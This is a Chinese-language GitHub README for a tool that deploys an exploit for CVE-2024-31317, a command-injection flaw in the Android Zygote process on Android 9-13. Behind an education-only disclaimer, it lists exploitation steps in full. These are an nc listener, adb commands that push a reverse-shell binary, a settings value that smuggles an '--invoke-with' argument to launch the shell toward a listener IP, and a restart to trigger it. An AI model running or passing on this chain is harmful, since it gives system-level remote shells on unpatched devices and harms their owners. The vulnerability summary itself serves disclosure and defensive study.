本项目仅用于安全研究和教育目的。使用本工具进行未经授权的测试是非法的。作者不对任何滥用或损害负责。
CVE-2024-31317 是一个影响 Android 9 至 Android 13 设备的严重安全漏洞,允许具有 WRITE_SECURE_SETTINGS 权限的应用程序通过命令注入获得系统级权限执行。
本项目提供了该漏洞的详细技术分析、概念验证代码以及自动化部署工具。
- 📱 支持 Android 9-13 全版本
- 🛠️ 自动化部署脚本
- 🔄 反向 Shell 连接
- 📊 详细的技术文档
- 🎯 模块化设计
- CVE ID: CVE-2024-31317
- 漏洞类型: 命令注入
- 严重等级: 高危 (High)
- CVSS 评分: 7.8
- 影响组件: Android Zygote 进程
- 修复状态: 已在 2024年6月 Android 安全补丁中修复
- ✅ Android 9-13
- ❌ Android 14+ (已修复)
- ❌ 已安装 2024年6月 或更新安全补丁的设备
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployerchmod +x compile.sh
./compile.sh# 启动监听器
nc -lvnp 4444
# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# 触发漏洞
adb shell stop && adb shell start本项目仅供安全研究和教育目的使用。使用本工具即表示您同意:
- 遵守所有适用的法律法规
- 仅用于合法的安全研究
- 对您的行为负全部责任
本项目采用 MIT 许可证 - 详见 LICENSE 文件
fcy10012 - GitHub
参考项目: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ 如果这个项目对您有帮助,请给它一个星标!